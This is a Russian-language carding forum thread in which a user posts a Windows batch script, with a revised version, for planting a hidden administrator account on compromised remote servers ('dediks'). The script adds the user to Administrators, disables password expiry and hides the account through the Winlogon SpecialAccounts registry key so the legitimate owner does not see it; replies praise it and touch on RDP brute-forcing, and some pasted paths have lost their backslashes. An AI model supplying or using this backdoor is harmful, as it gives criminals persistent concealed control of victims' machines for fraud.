Уважаемые пользователи форума, убедительно просим вас переходить в телеграмм продавца, исключительно по предоставленной ссылке. Проверяйте продавца, отправив сообщение на электронную почту, чтобы убедиться в том, что вы общаетесь действительно с ним.

Скрытая учетка на дедике, пишем батник

Тема в разделе "Хакинг. Программирование", создана пользователем qwerty888, 13 сен 2016.

  1. qwerty888

    qwerty888 Member

    Сообщения:
    57
    Симпатии:
    0
    Лежа в кровати и почти наблюдая мой первый сон, где сладкие Пуэрто-Риканки играют с моим воображением, ему помешала навязчева идея, которая навернека присуща и тебе мой юный, а может быть и опытный кардклабовец навязчива идея, которая вынуждает тебя бросить все, чем бы небыл или была увлечена.
    Мне вспомнилось то как последний раз попался дедик, в котором ручками пришлось создавать пользователя, а затем скрывать его, благодаря одному из наших шопов я узнал как это делается ручками и наконец то меня посетила идея развеяв мой и без того сладкий сон, нужно сделать батник, который все это сделает автоматически. Батник удобен тем что он весит очень мало, что позволяет его быстро закинуть на дедик и исполнить от имени администратора, а также то что ему не нужны не какие тяжелые библиотеки и все такое подобное.
    Итак объяснять что и к чему это долго и утомительно, по этому приступим к сути, все что нам понадобится это блокнот умеющих сохранять файлы в нужной кодировке, я предоставлю вариант сразу под ру и англоязычную версию винды, за основу была взята семерка на ней и проводились тесты:
    Стоит запомнить то что отличие ру и англиша всего лишь в группах пользователей и сохраняемой кодировке файла ибо если как для ру идет кодировка файла в OEM 866, а вы сохраните под utf или ansi то ничего не будет работать ибо русские символы будут отображены не корректно и они не будут существовать, в то время как под амер машину я сохранял как OEM-850
    В коде ниже идет 3 переменных
    rootpcname - Отвечает за имя машины на которой все это будет делатся, как и где смотреть думаю вы сами знаете или научитесь наконец то гуглить хоть иногда))
    rootusername - Имя создаваемого пользователя
    rootuserpass - Пароль пользователя

    @ECHO OFF
    SET rootpcname=Home-PC
    SET rootusername=Qwerty888
    SET rootuserpass=Club2CRD

    А здесь как раз и идет добавление пользователя, пароля и назначение его админом, если админ не нужен, то стоит удалить две последних строки
    net user %rootusername% %rootuserpass% /add
    net localgroup Administrators %rootusername% /add
    net localgroup Users %rootusername% /delete

    Как видно из кода выше, мы добавляем пользователя в группу Administrators и затем удаляем из группы пользователей Users во избежание конфликтов. Второй момент отличающий группы пользователей ру от амеров в названиях групп Administrators для агнлийской винды Администраторы для ру версии, Users и Пользователи соответственно, если немного ошибся с ру названиями то сорри ибо сохраненая кодировка не поддерживается у меня на данной машине и названия корявые, но в целом нам то и не ру дедики нужны)
    Ну а дальше идет анлим на пасс, незнаю зачем это но из тех обрывков пока собрал батник воедино это было решил также добавить, а также добавление записи в реестр для того что бы скрыть учетку от легита.
    От себя хочу также добавить, что незабывайте скрывать папку своего пользоватея на дедике, у многих людей скрытые папки не отображаются, а нам это только на руку, но а при желании можете заглянуть себе на машину нет ли у вас чего в реестре А если другие команды вам не о чем не говорят, значит гуглите, может откроете новый мир для себя и конечно полный исходник батника

    @ECHO OFF
    SET rootpcname=Home-PC
    SET rootusername=Qwerty888
    SET rootuserpass=Club2CRD
    net user %rootusername% %rootuserpass% /add
    net localgroup Administrators %rootusername% /add
    net localgroup Users %rootusername% /delete
    net accounts /maxpwage:unlimited
    C:WindowsSystem32cmd.exe /k C:WindowsSystem32eg.exe ADD \%rootpcname%HKLMSOFTWAREMicrosoftWindow s NTCurrentVersionWinlogonSpecialAccountsUserLis t /v %rootusername% /t REG_DWORD /d 0 /f
    EXIT

    Всем добра и успешного каржа
    Qwerty888 специально для Club2CRD
  2. qwerty888

    qwerty888 Member

    Сообщения:
    57
    Симпатии:
    0
    Проверил код на деле, то убрав лишнее он выглядит теперь так
    @ECHO OFF
    SET rootusername=Qwerty888
    SET rootuserpass=Club2CRD
    net user %rootusername% %rootuserpass% /add
    net localgroup Administrators %rootusername% /add
    net localgroup Users %rootusername% /delete
    net accounts /maxpwage:unlimited
    C:WindowsSystem32cmd.exe /k C:WindowsSystem32eg.exe ADD HKLMSOFTWAREMicrosoftWindow s NTCurrentVersionWinlogonSpecialAccountsUserLis t /v %rootusername% /t REG_DWORD /d 0 /f
    EXIT

    Как оказалось совсем не обязательно указывать имя локальной машины, если вы и так на ней сидите через рдп
  3. BaD_Men

    BaD_Men Member

    Сообщения:
    84
    Симпатии:
    0
    Красаувчик +1 в репу
  4. Bright

    Bright New Member

    Сообщения:
    19
    Симпатии:
    0
    А еще есть вот такая прога для создания скрытых учеток
  5. qwerty888

    qwerty888 Member

    Сообщения:
    57
    Симпатии:
    0
    Спасибо)

    Подскажи, а в чем его преимущество, сможет ли твой софт без админ прав сделать учетку админ? Потому что судя из размера там 200+Кб я не стал качать и все такое, но у меня сканер портов на сокетах весит всего 16кб и парочка мусорных файлов по столько же. Все это при желании можно скомпилировать на основе обращения к командной строке, но это не имеет смысла ибо когда ты заходишь на дед и к примеру вышвырнул даже иного пользователя, у тебя не будет времени качать софт 200 кб, а затем его исполнять ибо по всей видимости там подкрепляемые библиотеки по этому что удобнее один файлик меньше кб или твой на 200, где мембер не знает в чем суть иное дело, если бы ты выложил брутер, который в момент брута открывает дедик загружает свой файл, исполняет иго и закрывает сессию, это совершенно другой случай.

    А в добавок хочу добавить что все гениальное должно быть простым, ясным и легким. Всем добра
  6. Ulkyome

    Ulkyome New Member

    Сообщения:
    11
    Симпатии:
    0
    Спасибо не так давно искал на вроде решение )
  7. JTD.Monster

    JTD.Monster Member

    Сообщения:
    124
    Симпатии:
    0
    Ochen udobnaya vesh.
    Spasibo tebe.

Поделиться этой страницей